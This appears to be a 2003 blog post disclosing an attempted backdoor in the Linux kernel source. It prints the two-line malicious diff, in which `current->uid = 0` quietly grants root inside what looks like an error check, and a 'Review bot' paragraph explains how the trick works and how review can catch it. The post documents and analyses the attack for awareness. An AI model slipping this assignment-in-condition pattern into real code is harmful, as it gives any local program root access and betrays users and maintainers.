Swimming with the Razorfishes

Friday, November 07, 2003

It appears that someone tried to sneak a subtle backdoor into the Linux kernel source, one that would allow any application to elevate to root privileges.

The BitKeeper source is exported nightly and merged into a CVS repository, to give people access to the head of the tree without requiring BitKeeper. This CVS repository appears to have been directly changed, suggesting a breach on that BK host. When BitKeeper attempted to commit the daily code, the difference alerted the BitKeeper people to the change.



--- GOOD 2003-11-05 13:46:44.000000000 -0800

+++ BAD 2003-11-05 13:46:53.000000000 -0800

@@ -1111,6 +1111,8 @@

schedule();

goto repeat;

}

+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

+ retval = -EINVAL;

retval = -ECHILD;

end_wait4:

current->state = TASK_RUNNING;
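
Review bot: the condition in the added `if` uses `current->uid = 0`, which is an assignment, not the comparison `==`. Whenever `options == (__WCLONE|__WALL)` holds, the right-hand side of the `&&` runs and sets the calling task's uid to 0, which is root. Because the assigned value is 0, the whole condition evaluates false, so `retval = -EINVAL;` never executes; even if it did, the unconditional `retval = -ECHILD;` on the next line would overwrite it. The two added lines therefore have no legitimate effect and should be rejected. A genuine check would read `current->uid == 0`, and writing the constant first (`0 == current->uid`) or building with assignment-in-condition warnings enabled would make this kind of change stand out in review.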



Wow: current->uid = 0

That is some subtle hacking. I would not have noticed that.
